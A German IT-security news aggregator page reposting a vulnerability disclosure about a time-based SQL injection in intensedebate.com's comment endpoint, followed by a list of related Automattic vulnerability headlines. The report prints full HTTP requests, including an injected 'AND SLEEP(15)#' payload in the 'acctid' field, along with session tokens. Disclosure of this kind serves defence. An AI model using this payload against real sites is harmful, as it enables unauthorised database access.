Ausnahme gefangen: SSL certificate problem: certificate is not yet valid ๐Ÿ“Œ Automattic: [intensedebate.com] SQL Injection Time Based On /js/commentAction/

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security



๐Ÿ“š Automattic: [intensedebate.com] SQL Injection Time Based On /js/commentAction/


๐Ÿ’ก Newskategorie: Sicherheitslรผcken
๐Ÿ”— Quelle: vulners.com


image
[intensedebate.com] SQLi Time Based On /js/commentAction/ Summary: Hello, I have found a SQLI Injection Time Based on /js/commentAction/. When a user want to submit/reply to a comment, a JSON payload was send by a GET request. GET /js/commentAction/?data={"request_type":"0",+"params":+{+"firstCall":true,+"src":0,+"blogpostid":504704482,+"acctid":"251219",+"parentid":"0",+"depth":"0",+"type":"1",+"token":"7D0GVbxG10j8hndedjhegHsnfDrcv0Yh",+"anonName":"",+"anonEmail":"X",+"anonURL":"",+"userid":"26745290",+"token":"7D0GVbxG10j8hndedjhegHsnfDrcv0Yh",+"mblid":"1",+"tweetThis":"F",+"subscribeThis":"1",+"comment":"w"}} HTTP/1.1 Host: www.intensedebate.com The key "acctid":"251219" is vulnerable to SQL Injection Time based Detection : GET /js/commentAction/?data={"request_type":"0",+"params":+{+"firstCall":true,+"src":0,+"blogpostid":504704482,+"acctid":"251219%20AND%20SLEEP(15)%23",+"parentid":"0",+"depth":"0",+"type":"1",+"token":"7D0GVbxG10j8hndedjhegHsnfDrcv0Yh",+"anonName":"",+"anonEmail":"X",+"anonURL":"",+"userid":"26745290",+"token":"7D0GVbxG10j8hndedjhegHsnfDrcv0Yh",+"mblid":"1",+"tweetThis":"F",+"subscribeThis":"1",+"comment":"w"}} HTTP/1.1 Host: www.intensedebate.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: */* Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Referer:... ...



๐Ÿ“Œ Automattic: [intensedebate.com] SQL Injection Time Based On /js/commentAction/


๐Ÿ“ˆ 108.14 Punkte

๐Ÿ“Œ Automattic: [intensedebate.com] SQL Injection Time Based on /changeReplaceOpt.php


๐Ÿ“ˆ 69.16 Punkte

๐Ÿ“Œ Automattic: SQL Injection intensedebate.com


๐Ÿ“ˆ 57.84 Punkte

๐Ÿ“Œ Automattic: XSS in Email Input [intensedebate.com]


๐Ÿ“ˆ 50.37 Punkte

๐Ÿ“Œ Automattic: Non-changing "_idnonce" value leads to CSRF on accounts at https://intensedebate.com for account takeover


๐Ÿ“ˆ 50.37 Punkte

๐Ÿ“Œ Automattic: DOM XSS on multiple Automattic domains through postMessages


๐Ÿ“ˆ 39.26 Punkte

๐Ÿ“Œ Automattic: SQL Injection Union Based


๐Ÿ“ˆ 32.25 Punkte

๐Ÿ“Œ Automattic: Sql injection on docs.atavist.com


๐Ÿ“ˆ 27.1 Punkte

๐Ÿ“Œ Automattic: DOM based XSS in the WooCommerce plugin


๐Ÿ“ˆ 24.78 Punkte

๐Ÿ“Œ [remote] Simple Student Attendance System v1.0 - 'classid' Time Based Blind & Union Based SQL Injection


๐Ÿ“ˆ 23.94 Punkte

๐Ÿ“Œ Low CVE-2016-10763: Automattic Camptix event ticketing


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Medium CVE-2016-10762: Automattic Camptix event ticketing


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Low CVE-2015-9357: Automattic Akismet


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Low CVE-2015-9359: Automattic Jetpack


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Automattic: Follow by email allows for following by unverified emails


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Automattic: Theme Assets uploader allows HTML content


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Low CVE-2013-2008: Automattic Wp super cache


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Medium CVE-2013-2009: Automattic Wp super cache


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Medium CVE-2013-2010: Automattic Wp super cache


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Automattic WooCommerce plugin up to 3.4.5 on WordPress Privilege Check woocommerce.php denial of service


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Wordpress Parent Automattic Is Closing Its San Francisco Office Because Its Employees Never Show Up


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Automattic: Wordpress VIP leaks email of the test a/c


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Automattic: WooCommerce: Persistent XSS via customer address (state/county)


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Automattic: Gaining unlimited bonus points on websites with WooCommerce Points and Rewards


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Automattic WooCommerce plugin up to 3.2.3 on WordPress class-wc-shortcode-products.php get_products() privilege escalation


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Automattic (creator of Wordpress) invests $5M in Matrix


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Wordpress-Anbieter Automattic: Geldspritze fรผr Riot-Messenger


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Automattic: Insufficient DKIM record with RSA 512-bit key used on WordPress.com


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Automattic: Stored XSS vulnerability in comments on *.wordpress.com


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Automattic: Wordpress-Unternehmen steigt bei Matrix ein


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Medium CVE-2020-8215: Automattic Canvas


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Automattic Mongoose up to 5.7.4 Access Control privilege escalation


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ CVE-2022-2564 | automattic mongoose up to 6.4.5 prototype pollution


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Automattic: [IDOR] Attacker user can Approve/Decline AFK on the behalf of other users


๐Ÿ“ˆ 19.63 Punkte

๐Ÿ“Œ Automattic: Stored XSS in assets.txmblr.com


๐Ÿ“ˆ 19.63 Punkte











matomo